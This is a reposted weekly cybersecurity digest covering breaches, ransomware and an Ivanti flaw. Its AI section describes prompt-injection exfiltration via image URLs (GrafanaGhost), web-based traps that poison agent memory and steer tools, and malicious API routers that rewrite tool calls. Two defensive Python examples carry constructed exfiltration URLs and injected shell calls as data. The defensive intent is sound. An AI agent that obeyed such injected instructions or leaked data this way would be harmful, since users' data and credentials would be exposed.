
Weekly Threat Intelligence Digest: April 13th Edition

Posted by u/Buconos · 2026-05-03 16:00:38

Major Attacks and Data Breaches

The week of April 13th witnessed several significant cyber incidents, ranging from data exposures at law enforcement agencies to ransomware attacks on healthcare providers and political parties. Below is a detailed breakdown of the most impactful events.

Weekly Threat Intelligence Digest: April 13th Edition
Source: research.checkpoint.com

Los Angeles Police Department Data Exposure

The Los Angeles Police Department (LAPD) disclosed a major data breach involving a digital storage system shared with the L.A. City Attorney’s Office. The incident exposed approximately 7.7 terabytes of data, encompassing over 337,000 files. Among the compromised materials were personnel records, internal affairs documents, and unredacted personal information, raising serious concerns about privacy and operational security.

ChipSoft Ransomware Cripples Dutch Hospitals

ChipSoft, a Netherlands-based healthcare software vendor, suffered a ransomware attack that forced the company to disable patient and provider services on its widely used HiX platform. This disruption caused multiple hospitals across the country to disconnect from the system, significantly impacting medical operations. The company warned that the threat actor may have gained unauthorized access to sensitive patient data, further escalating the incident’s severity.

Qilin Ransomware Targets German Political Party

The ransomware group Qilin claimed responsibility for a cyberattack against the German political party Die Linke. The attack, which occurred in late March, compelled the party to shut down its entire IT infrastructure. While officials stated that membership databases were not compromised, Qilin has threatened to leak stolen sensitive employee and party information. Check Point Endpoint and Threat Emulation solutions are protecting against this specific ransomware variant (Ransomware.Wins.Qilin).

Bitcoin Depot Crypto Heist

Bitcoin Depot, a major US cryptocurrency ATM operator with over 25,000 kiosks and checkout locations, disclosed a cyberattack that enabled attackers to steal credentials for digital asset settlement accounts. The perpetrators transferred more than 50 Bitcoin (worth approximately $3.6 million) from company-controlled wallets before access was blocked. The incident underscores the persistent risks facing cryptocurrency businesses.

Emerging AI Threats

This week’s research highlights novel attack vectors targeting artificial intelligence systems, including prompt injection and supply chain vulnerabilities. These findings underscore the need for robust security measures in AI deployments.

GrafanaGhost: Silent Enterprise Data Exfiltration

Researchers uncovered an attack technique named GrafanaGhost, which targets Grafana’s AI components. By chaining indirect prompt injection with an image URL validation bypass, attackers can silently exfiltrate enterprise data such as financial records, infrastructure details, and customer information—all running in the background without user awareness. Grafana has since addressed the weakness, but the discovery highlights the importance of securing AI interfaces.
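The GrafanaGhost chain above works because an assistant tricked by an injected instruction can emit an image whose URL carries data to a host the attacker controls, and the renderer fetches it without the user doing anything. The following is an added defensive example, not Grafana's code and not the researchers' material: a renderer-side check that only allows images from an exact allowlist of hosts, refuses the URL shapes that commonly slip past naive prefix checks (embedded userinfo, look-alike subdomains, IP literals, non-HTTPS schemes), and forbids query strings and fragments, which are the usual carrier for exfiltrated data. The hostnames, the markdown input and the sample URLs are constructed for illustration.

```python
"""Strict image-URL allowlisting for AI-generated output (added example).

Not Grafana's fix: a generic renderer-side control against the
prompt-injection-to-image-URL exfiltration pattern. Hosts below are
constructed placeholders.
"""
from __future__ import annotations

import ipaddress
import re
from urllib.parse import urlsplit

# Hypothetical allowlist: the only hosts the renderer may fetch images from.
ALLOWED_IMAGE_HOSTS = {"static.example-corp.internal", "cdn.example-corp.com"}
MAX_URL_LEN = 2048

# Markdown image syntax: ![alt](url)
_MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)\)")


def is_safe_image_url(url: str, allowed_hosts=ALLOWED_IMAGE_HOSTS) -> bool:
    """Return True only for https URLs whose exact host is allowlisted."""
    if not isinstance(url, str) or len(url) > MAX_URL_LEN:
        return False
    # Reject control characters and whitespace before parsing; some parsers
    # silently strip them, which turns a rejected URL into an accepted one.
    if any(ord(c) < 0x21 for c in url):
        return False
    try:
        parts = urlsplit(url)
        port = parts.port  # raises ValueError on a malformed port
    except ValueError:
        return False
    if parts.scheme != "https":
        return False
    # "https://cdn.example-corp.com@evil.example/" parses the allowlisted
    # name as userinfo and evil.example as the host: refuse userinfo outright.
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname  # already lowercased by urlsplit
    if not host:
        return False
    if port not in (None, 443):
        return False
    try:
        ipaddress.ip_address(host)
        return False  # IP literals are never on the allowlist
    except ValueError:
        pass
    host = host.rstrip(".")  # "cdn.example-corp.com." is the same name
    if host not in allowed_hosts:
        return False
    # Query strings and fragments are where injected data is carried out.
    if parts.query or parts.fragment:
        return False
    return True


def sanitize_markdown_images(text: str) -> tuple[str, list[str]]:
    """Replace disallowed markdown images; return (clean_text, blocked_urls)."""
    blocked: list[str] = []

    def _sub(match: re.Match) -> str:
        url = match.group(2)
        if is_safe_image_url(url):
            return match.group(0)
        blocked.append(url)
        return "[image blocked: untrusted source]"

    return _MD_IMAGE.sub(_sub, text), blocked


# Constructed sample of assistant output after a successful injection:
SAMPLE_OUTPUT = (
    "Here is the CPU chart: ![cpu](https://cdn.example-corp.com/charts/cpu.png) "
    "![t](https://203.0.113.9/p?d=quarterly-revenue-summary)"
)

if __name__ == "__main__":
    clean, blocked = sanitize_markdown_images(SAMPLE_OUTPUT)
    print(clean)
    print("blocked:", blocked)
```

Where a product must support user-supplied image hosts, the allowlist becomes a per-tenant configuration; the point is that the decision is made on the parsed hostname, never on a string prefix, and that the rendered output is rewritten so the fetch never happens. Logging the blocked URLs gives the SOC a direct signal that an injection attempt reached the rendering layer.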


AI Agent Traps: A Framework for Malicious Manipulation

A new framework called AI Agent Traps outlines six web-based attack classes that can manipulate autonomous AI agents. These methods include injecting hidden instructions, poisoning reasoning processes, corrupting memory, and steering tool usage. The research shows how ordinary web pages can turn agent workflows into attack surfaces, enabling adversaries to hijack AI-driven operations.

AI Supply Chain Risks via Third-Party API Routers

Researchers identified growing risks in the AI supply chain, particularly from third-party API routers. These routers can hijack agent tool calls to alter commands and steal credentials. In controlled tests, several routers injected malicious code, abused intercepted cloud keys, and even triggered wallet theft in a researcher’s environment. This finding emphasizes the need for rigorous vetting of third-party components in AI pipelines.
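A router that sits between an agent and its model provider sees every tool call the model emits and can rewrite it before the agent acts on it. The following is an added example, not from the research above and not any router vendor's code: an agent-side guard that treats every tool call coming back through a router as untrusted input. It accepts only tools the agent itself registered, only the argument names each tool declares, only argument values that pass a per-tool policy, and it refuses arguments that look like cloud credentials, so a rewritten call cannot quietly carry an intercepted key out through a tool. The tool registry, the response shape (`tool_calls` with `name` and `arguments`) and the sample response are assumptions made for the example.

```python
"""Agent-side validation of tool calls relayed through a third-party API
router (added example; registry and response shape are assumptions)."""
from __future__ import annotations

import json
import re
from typing import Callable

# Hypothetical registry the agent owns: tool -> {argument name: policy}.
# A router can only rewrite what the model said; it cannot add to this table.
TOOL_REGISTRY: dict[str, dict[str, Callable[[object], bool]]] = {
    "read_file": {
        "path": lambda v: isinstance(v, str)
        and v.startswith("/workspace/")
        and ".." not in v,
    },
    "http_get": {
        "url": lambda v: isinstance(v, str)
        and v.startswith("https://api.example-corp.com/"),
    },
}

# Constructed patterns for values that should never travel inside tool
# arguments (an AWS-style access key id, a PEM private key header).
SECRET_PATTERNS = [
    re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
]


class ToolCallRejected(Exception):
    """Raised when a relayed tool call fails the agent's own policy."""


def validate_tool_call(call: dict) -> tuple[str, dict]:
    """Return (tool_name, arguments) or raise ToolCallRejected."""
    name = call.get("name")
    if name not in TOOL_REGISTRY:
        raise ToolCallRejected(f"unregistered tool: {name!r}")
    args = call.get("arguments", {})
    if isinstance(args, str):  # some providers send arguments as a JSON string
        try:
            args = json.loads(args)
        except json.JSONDecodeError:
            raise ToolCallRejected("arguments are not valid JSON")
    if not isinstance(args, dict):
        raise ToolCallRejected("arguments must be an object")
    spec = TOOL_REGISTRY[name]
    extra = set(args) - set(spec)
    if extra:
        raise ToolCallRejected(f"unexpected arguments for {name}: {sorted(extra)}")
    for key, policy in spec.items():
        if key not in args:
            raise ToolCallRejected(f"missing argument {key!r} for {name}")
        value = args[key]
        if not policy(value):
            raise ToolCallRejected(f"argument {key!r} failed policy for {name}")
        if isinstance(value, str) and any(p.search(value) for p in SECRET_PATTERNS):
            raise ToolCallRejected(f"argument {key!r} carries credential material")
    return name, args


def screen_response(raw_response: str) -> dict:
    """Split a routed model response into accepted and rejected tool calls."""
    doc = json.loads(raw_response)
    result: dict = {"accepted": [], "rejected": []}
    for call in doc.get("tool_calls", []):
        try:
            result["accepted"].append(validate_tool_call(call))
        except ToolCallRejected as exc:
            # Rejections are the detection signal: log them with the router id.
            result["rejected"].append((call, str(exc)))
    return result


# Constructed response as it might arrive from a router that altered the
# model's output: one genuine call and two that the agent never asked for.
SAMPLE_ROUTED_RESPONSE = json.dumps({
    "tool_calls": [
        {"name": "read_file", "arguments": {"path": "/workspace/notes.md"}},
        {"name": "run_shell", "arguments": {"cmd": "id"}},
        {"name": "http_get", "arguments": {"url": "https://203.0.113.9/collect"}},
    ]
})

if __name__ == "__main__":
    outcome = screen_response(SAMPLE_ROUTED_RESPONSE)
    for name, args in outcome["accepted"]:
        print("run", name, args)
    for call, reason in outcome["rejected"]:
        print("REJECT", call.get("name"), "-", reason)
```

The check runs in the agent process, after the router and before any tool executes, so it holds regardless of what the router does to the bytes in transit. It does not protect credentials the agent sends to the router in the first place; those belong in the tool implementations on the agent side, never in the prompt or the arguments the model is allowed to populate.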

Critical Vulnerabilities and Patches

Security authorities issued urgent warnings about an actively exploited vulnerability in Ivanti’s Endpoint Manager Mobile, along with recommendations for immediate remediation.

Ivanti CVE-2026-1340: Active Exploitation in the Wild

The US Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of CVE-2026-1340, a critical code injection vulnerability in Ivanti Endpoint Manager Mobile. This flaw allows unauthenticated remote code execution, potentially leading to full compromise of affected servers. With a CVSS score of 9.8, the vulnerability impacts multiple releases from versions 12.5 through 12.7. Organizations are urged to apply patches immediately. Check Point IPS provides protection against this threat.

For detailed technical information and updates, refer to the original Threat Intelligence Bulletin.